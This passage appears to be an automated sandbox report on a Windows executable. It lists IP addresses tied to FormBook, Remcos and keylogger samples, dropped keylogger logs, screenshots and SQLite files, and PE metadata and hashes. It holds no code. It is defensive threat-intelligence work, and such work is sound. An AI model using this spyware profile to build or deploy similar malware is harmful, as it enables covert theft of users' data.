                                                                                      • 162.0.209.213
                                                                                      yakuza.i586.elfGet hashmaliciousMiraiBrowse
                                                                                      • 162.36.0.12
                                                                                      x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 162.64.74.120
                                                                                      HXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                                                      • 162.0.211.143
                                                                                      meow.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                      • 162.52.234.30
                                                                                      8m65n7ieJC.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      Factura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                                      • 162.0.215.33
                                                                                      Pago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 162.55.60.2
                                                                                      Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                                                      • 162.0.211.143
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      37f463bf4616ecd445d4a1937da06e19WNIOSEK BUD#U017bETOWY 25-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                      • 149.154.167.220
                                                                                      412300061474#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      Cargo Invoice_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      KAHILINGAN NG BADYET 25-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      URGENT!! DHL invoice SG00101637 Adobe#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      No context
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):429
                                                                                      Entropy (8bit):4.318603957851097
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:tD0E0E0E0E0E0E0MQZ0MQZ0MQZ0MQZ0MQZ0MQZx:tI55555566666v
                                                                                      MD5:D2A71BEA81BB437FAC4CA3CDBDA29B60
                                                                                      SHA1:95A392063BB3BB5233C426DDFE3B6FA9D3084736
                                                                                      SHA-256:81DF32B3F782379338C6023F0751178EACB649BE9EEDB45ED272CFEDA8393CDB
                                                                                      SHA-512:EFF4D833360CACC2C8A622CD1BB1E766583553DC0F794C45F43F0ECAE90EA655A6CE842E70F08A724CC38CBF1AA72EF1C45783E9538A42021E5E2A886A22D5A1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..[07:40:24]<<Program Manager>>....[07:40:24]<<Program Manager>>....[07:40:24]<<Program Manager>>....[07:40:24]<<Program Manager>>....[07:40:24]<<Program Manager>>....[07:40:24]<<Program Manager>>....[07:40:24]<<Program Manager>>....[07:40:25]<<Program Manager>>....[07:40:25]<<Program Manager>>....[07:40:25]<<Program Manager>>....[07:40:25]<<Program Manager>>....[07:40:25]<<Program Manager>>....[07:40:25]<<Program Manager>>..
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):363
                                                                                      Entropy (8bit):4.267570709609606
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:tSRVf1WE4g5Vf1WE4g5Vf1WE4g5Vf1WE4g5Vf0WE4g5Vf0WE4g5Vf0WE4g5Vf0Wh:tSg0Y0Y0Y0oW0oW0oW0oW0oW0oW04fx
                                                                                      MD5:0FA3A6E60EB91D14D64850C2CA5A4ACA
                                                                                      SHA1:DE206FB312DD9686BA6DE1E3D0CD88A8CB038D19
                                                                                      SHA-256:B5B21D0AF1C5B0D6069C92E972EBB9DD1D826BB39DAA70171D5920779581740C
                                                                                      SHA-512:C9A125EE1FF4C9BBD2236EEF8C65724D0BE5A5DFDAE1C3D228705146FD5F9D5CC705BFA8B0872C46E44C88D8E5DCD63C00356019DBC3CC254C6F520CFB0CD7AC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..[07:40:46]<<Program Manager>>....[07:40:46]<<Program Manager>>....[07:40:46]<<Program Manager>>....[07:40:46]<<Program Manager>>....[07:40:47]<<Program Manager>>....[07:40:47]<<Program Manager>>....[07:40:47]<<Program Manager>>....[07:40:47]<<Program Manager>>....[07:40:47]<<Program Manager>>....[07:40:47]<<Program Manager>>....[07:40:48]<<Program Manager>>..
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):396
                                                                                      Entropy (8bit):4.368040864055635
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:tYp09p09p09p0qW0qW0qW0qW0qW0qW0qW0+Zx:tY+9+9+9+44444442
                                                                                      MD5:EC8E327127A5B42E242AF8366E6DC2CA
                                                                                      SHA1:8BB42E80680204F0BB86FE3C579FAA3D334BE2FE
                                                                                      SHA-256:331D3B7D3268D2B2223D484C87EB996EBC53ED9149547BA8C04AC8DD8C5B67D8
                                                                                      SHA-512:A4E184F46AC5141972EA7896D5ADAD8C405464CE3770DCC05EE15CA2F214933DF3558D08BE102B1B39DAAFF375B253DAC8E3CDDC12F8E8A46F8C614B9E99B7D8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..[07:41:19]<<Program Manager>>....[07:41:19]<<Program Manager>>....[07:41:19]<<Program Manager>>....[07:41:19]<<Program Manager>>....[07:41:20]<<Program Manager>>....[07:41:20]<<Program Manager>>....[07:41:20]<<Program Manager>>....[07:41:20]<<Program Manager>>....[07:41:20]<<Program Manager>>....[07:41:20]<<Program Manager>>....[07:41:20]<<Program Manager>>....[07:41:27]<<Program Manager>>..
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):363
                                                                                      Entropy (8bit):4.355892875824579
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:tSRVfofE4g5VfofE4g5VfofE4g5VfhfE4g5VfhfE4g5VfhfE4g5VfhfE4g5VfhfP:tSy0q0q0Z0Z0Z0Z0Z0Z0Z0cpx
                                                                                      MD5:05036CDB3858767FCFC4B78908A07913
                                                                                      SHA1:9E340005B4D5D558B762AE26F4D0DFFFE7DBE6FC
                                                                                      SHA-256:C5428B89012A7EF663A84CDD0D0EE564DA4C4179B677F17A03EF92ACB27888BB
                                                                                      SHA-512:7701E149C04DD4CB95B295A2FEDD2BCFF54BE878C99A75D5950A0A4F80036FD6C2F58D64EA6D38C346C0393E11113DA3D08525333B194A2C7A9FA230818D68C0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..[07:40:35]<<Program Manager>>....[07:40:35]<<Program Manager>>....[07:40:35]<<Program Manager>>....[07:40:36]<<Program Manager>>....[07:40:36]<<Program Manager>>....[07:40:36]<<Program Manager>>....[07:40:36]<<Program Manager>>....[07:40:36]<<Program Manager>>....[07:40:36]<<Program Manager>>....[07:40:36]<<Program Manager>>....[07:40:37]<<Program Manager>>..
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):6798
                                                                                      Entropy (8bit):4.428720057734347
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:39+F+W+W+W+W+W+l+l+l+l+l+l+l+s+s+s+s+s+s+s+s+z+z+z+z+z+z+6+6+6+j:39+F+W+W+W+W+W+l+l+l+l+l+l+l+s+T
                                                                                      MD5:E5D0CABCEB7ECF832676D5B9CC78733D
                                                                                      SHA1:35685DF144EEEA4E821C481E9B89B41BB9A98E4A
                                                                                      SHA-256:926748396FACD17AC507FD53E880CEEE6DDA09AC44B0143D099B916D1B2E7EC9
                                                                                      SHA-512:FDC804206459791C5CEDC37822BEBBB35C0FA7EEC749DE654E8D206D28C444072C3CB1F4D8D3A384E628C736DEF10FF700B6952A4CB433B5A42F65955CF9AF6B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..[07:39:29]<<Program Manager>>....[07:39:32]<<Program Manager>>....[07:39:42]<<Program Manager>>....[07:39:42]<<Program Manager>>....[07:39:42]<<Program Manager>>....[07:39:42]<<Program Manager>>....[07:39:42]<<Program Manager>>....[07:39:43]<<Program Manager>>....[07:39:43]<<Program Manager>>....[07:39:43]<<Program Manager>>....[07:39:43]<<Program Manager>>....[07:39:43]<<Program Manager>>....[07:39:43]<<Program Manager>>....[07:39:43]<<Program Manager>>....[07:39:44]<<Program Manager>>....[07:39:44]<<Program Manager>>....[07:39:44]<<Program Manager>>....[07:39:44]<<Program Manager>>....[07:39:44]<<Program Manager>>....[07:39:44]<<Program Manager>>....[07:39:44]<<Program Manager>>....[07:39:44]<<Program Manager>>....[07:39:45]<<Program Manager>>....[07:39:45]<<Program Manager>>....[07:39:45]<<Program Manager>>....[07:39:45]<<Program Manager>>....[07:39:45]<<Program Manager>>....[07:39:45]<<Program Manager>>....[07:39:46]<<Program Manager>>....[07:39:46]<<Program Manager>>....[07:39:4
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):363
                                                                                      Entropy (8bit):4.343150440921091
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:tSy/W0K/0K/0K/0K/0K/0K/0K/0KF0KF0Kupx:t+0E0E0E0E0E0E0E0m0m05x
                                                                                      MD5:249816B16D237A76BA71BCB559F171D7
                                                                                      SHA1:393F715669B61A4DB6878C9D1CB480735814D4CA
                                                                                      SHA-256:6E109F0C34C81B608FC1EBD8E5C476578D58064C801B77D63EB09C98C1A9937F
                                                                                      SHA-512:7CF1625030490D737F9A885576F5AFCB775FE5D85F2FB351AEC10A2E058FEEDC65274CE1BFEC70BF4F577793BD7D884709C8719D45650B273BB191552C0BFEDC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..[07:41:08]<<Program Manager>>....[07:41:09]<<Program Manager>>....[07:41:09]<<Program Manager>>....[07:41:09]<<Program Manager>>....[07:41:09]<<Program Manager>>....[07:41:09]<<Program Manager>>....[07:41:09]<<Program Manager>>....[07:41:09]<<Program Manager>>....[07:41:10]<<Program Manager>>....[07:41:10]<<Program Manager>>....[07:41:17]<<Program Manager>>..
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):396
                                                                                      Entropy (8bit):4.378675720057007
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:tSa010101010101010Cf0Cf0Cf0Kx41Zx:tZ010101010101010M0M0M0CWx
                                                                                      MD5:FAF866F10A29CF8DA36E5053113070CC
                                                                                      SHA1:86B1009E4B8BD94EB3A0613E035F76EB04D3617E
                                                                                      SHA-256:A7674EA4B609FB15741A3D09FD72710CFA2336B0A5945013A7D243B90582280D
                                                                                      SHA-512:90534C897C178B764E0C20EB3BCA519B00DCA32592A6FD5CC6CDD56D3258A9CBC955D371F83D2FD07578FC6BE840EA5EEA4E23B12EB748E8B5C79B6F4426B952
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..[07:40:57]<<Program Manager>>....[07:40:58]<<Program Manager>>....[07:40:58]<<Program Manager>>....[07:40:58]<<Program Manager>>....[07:40:58]<<Program Manager>>....[07:40:58]<<Program Manager>>....[07:40:58]<<Program Manager>>....[07:40:58]<<Program Manager>>....[07:40:59]<<Program Manager>>....[07:40:59]<<Program Manager>>....[07:40:59]<<Program Manager>>....[07:41:06]<<Program Manager>>..
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):51200
                                                                                      Entropy (8bit):0.8745947603342119
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.775400358539719
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:bysTDU5vhz9irDkIBk8UeaMVR8DkxLJbO83/gZE+2PJkVVPJ+a6jSxqkRMMUUUXb:hTevN9i7b/gkevx1bMpW1XlI
                                                                                      MD5:AF1CAE3099E67268609FE04AE1F83E7F
                                                                                      SHA1:4A252FA7B6CA0B3620A9A572913C07434368CC6B
                                                                                      SHA-256:6CCBDE8C0F54C6851CA99BD45F97D906832365D6B13F3565CDA9FC946151B7CB
                                                                                      SHA-512:2DB3DD9C847135F06ACE07497B98A9CEEB0FFF6208604B2679EA445CCCC1E136688B97803AFDE1E22D809D007919CDC132506DD60A33ADE7B5C0E5B0236030B9
                                                                                      Malicious:false
                                                                                      Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.775449406385022
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:b2STDU5vhz9irDkIBk8UeaMVR8DkxLJbO83/gZE+2PJkVVPJ+a6jSxqkRMMUUUXb:PTevN9i7b/gkevx1bMpW1XlI
                                                                                      MD5:4212AD06D5AF5F15B8129F316AB0A0EA
                                                                                      SHA1:CD49960A20A36A14D48390E0297EEB64B2D9A8F8
                                                                                      SHA-256:58AC81EA31CFFDB1D856221DF9B8D3D3A8136D61D2184FFE93A3E9F4E5697C10
                                                                                      SHA-512:DD1E8AA96321A3132609867D92024DEA5D3521C982E7B2F84B6A73D252D39586157DC620B55D46AC3FC71D697AFAE85598036C71A204A458F43DB587C09150F5
                                                                                      Malicious:false
                                                                                      Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.781535125560239
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:b2STDU5vhz9irDkIBk8UeaMVR8DkxLJbO83/gZE+2PJkVVPJ+a6jSxqkRMMUUUX7:PTevN9i7b/gkevx1bMpW1XVI
                                                                                      MD5:5CA75E0D70A2CA06134D1BDF5D6B6046
                                                                                      SHA1:B4D2352BD8192268D33C5A723ED60EBB2E19DBF5
                                                                                      SHA-256:D0F55B81AF375BA8F6E06432324CA05C5F8971D78FFA627CD2D4ADC5C6FE9E80
                                                                                      SHA-512:397169782C7BC76CA2365E506BF94D682E2234D7D544210B8D80D1EE992104D8946CA134A42944B45E32B86C24DD7C8B67D7BE0D65347D1056D194F03AC76555
                                                                                      Malicious:false
                                                                                      Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.775400358539719
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:bysTDU5vhz9irDkIBk8UeaMVR8DkxLJbO83/gZE+2PJkVVPJ+a6jSxqkRMMUUUXb:hTevN9i7b/gkevx1bMpW1XlI
                                                                                      MD5:AF1CAE3099E67268609FE04AE1F83E7F
                                                                                      SHA1:4A252FA7B6CA0B3620A9A572913C07434368CC6B
                                                                                      SHA-256:6CCBDE8C0F54C6851CA99BD45F97D906832365D6B13F3565CDA9FC946151B7CB
                                                                                      SHA-512:2DB3DD9C847135F06ACE07497B98A9CEEB0FFF6208604B2679EA445CCCC1E136688B97803AFDE1E22D809D007919CDC132506DD60A33ADE7B5C0E5B0236030B9
                                                                                      Malicious:false
                                                                                      Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.775449406385022
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:b2STDU5vhz9irDkIBk8UeaMVR8DkxLJbO83/gZE+2PJkVVPJ+a6jSxqkRMMUUUXb:PTevN9i7b/gkevx1bMpW1XlI
                                                                                      MD5:4212AD06D5AF5F15B8129F316AB0A0EA
                                                                                      SHA1:CD49960A20A36A14D48390E0297EEB64B2D9A8F8
                                                                                      SHA-256:58AC81EA31CFFDB1D856221DF9B8D3D3A8136D61D2184FFE93A3E9F4E5697C10
                                                                                      SHA-512:DD1E8AA96321A3132609867D92024DEA5D3521C982E7B2F84B6A73D252D39586157DC620B55D46AC3FC71D697AFAE85598036C71A204A458F43DB587C09150F5
                                                                                      Malicious:false
                                                                                      Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.775400358539719
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:bysTDU5vhz9irDkIBk8UeaMVR8DkxLJbO83/gZE+2PJkVVPJ+a6jSxqkRMMUUUXb:hTevN9i7b/gkevx1bMpW1XlI
                                                                                      MD5:AF1CAE3099E67268609FE04AE1F83E7F
                                                                                      SHA1:4A252FA7B6CA0B3620A9A572913C07434368CC6B
                                                                                      SHA-256:6CCBDE8C0F54C6851CA99BD45F97D906832365D6B13F3565CDA9FC946151B7CB
                                                                                      SHA-512:2DB3DD9C847135F06ACE07497B98A9CEEB0FFF6208604B2679EA445CCCC1E136688B97803AFDE1E22D809D007919CDC132506DD60A33ADE7B5C0E5B0236030B9
                                                                                      Malicious:false
                                                                                      Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.775400358539719
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:bysTDU5vhz9irDkIBk8UeaMVR8DkxLJbO83/gZE+2PJkVVPJ+a6jSxqkRMMUUUXb:hTevN9i7b/gkevx1bMpW1XlI
                                                                                      MD5:AF1CAE3099E67268609FE04AE1F83E7F
                                                                                      SHA1:4A252FA7B6CA0B3620A9A572913C07434368CC6B
                                                                                      SHA-256:6CCBDE8C0F54C6851CA99BD45F97D906832365D6B13F3565CDA9FC946151B7CB
                                                                                      SHA-512:2DB3DD9C847135F06ACE07497B98A9CEEB0FFF6208604B2679EA445CCCC1E136688B97803AFDE1E22D809D007919CDC132506DD60A33ADE7B5C0E5B0236030B9
                                                                                      Malicious:false
                                                                                      Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):3932214
                                                                                      Entropy (8bit):6.775400358539719
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:bysTDU5vhz9irDkIBk8UeaMVR8DkxLJbO83/gZE+2PJkVVPJ+a6jSxqkRMMUUUXb:hTevN9i7b/gkevx1bMpW1XlI
                                                                                      MD5:AF1CAE3099E67268609FE04AE1F83E7F
                                                                                      SHA1:4A252FA7B6CA0B3620A9A572913C07434368CC6B
                                                                                      SHA-256:6CCBDE8C0F54C6851CA99BD45F97D906832365D6B13F3565CDA9FC946151B7CB
                                                                                      SHA-512:2DB3DD9C847135F06ACE07497B98A9CEEB0FFF6208604B2679EA445CCCC1E136688B97803AFDE1E22D809D007919CDC132506DD60A33ADE7B5C0E5B0236030B9
                                                                                      Malicious:false
                                                                                      Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1239949490932863
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.017262956703125623
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                      Malicious:false
                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):6.8287734610416235
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 98.59%
                                                                                      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                      • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                      • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      File name:wMy37vlfvz.exe
                                                                                      File size:459'776 bytes
                                                                                      MD5:8f6ee9ba8ff5fd89141322d36e8fe46d
                                                                                      SHA1:d316c5f7b286ca316129aed8ddd8baeaaa07961b
                                                                                      SHA256:16efabc49c172527044fbf2015d1f48531cfb7b306b98fcd5c6fc16b38c68da0
                                                                                      SHA512:cdac0887060381f8de39d3066454078a801038ad72381c03b9f5d0b9feb6656b04e4b580e21df9c41f274da730e071108724156e1e0bcfa658ec07ee1e8b4e88
                                                                                      SSDEEP:12288:+CM2hGhIBUUAxT+Grwn5wOZ9iykdOjYKkJj6GmZU:j9GRUZrZ9iHdQYb6nZ
                                                                                      TLSH:82A4293AE751612EF162C4B0B6E49257A8156D362288EC6BFB819F4931311D3ECF931F
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9...9...9.......8...P...?.......8...Rich9...........PE..L..._x=g.............................<............@................
                                                                                      Icon Hash:00869eb0b230201f
                                                                                      Entrypoint:0x403cb4
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
